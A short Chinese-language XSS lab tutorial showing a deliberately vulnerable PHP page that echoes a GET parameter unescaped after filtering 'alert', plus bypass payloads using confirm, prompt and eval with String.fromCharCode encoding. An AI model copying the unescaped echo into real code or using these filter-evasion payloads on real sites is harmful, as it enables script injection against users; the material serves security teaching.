对alert过滤绕过
0x00
简单看下php代码,对alert进行了过滤包括其大小写
<?php require_once '../header.php';
if (preg_match('/alert/i', $_GET["name"])) {
die("error");
}
?>
Hello <?php echo $_GET["name"]; ?>
0x01
可以使用类似alert的方法来弹窗比如confirm,prompt
<script>confirm('xss')</script>
<script>prompt('xss')</script>
0x02
通过编码绕过,String.fromCharCode()编码来绕过
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 47, 120, 115, 115, 47, 41))</script>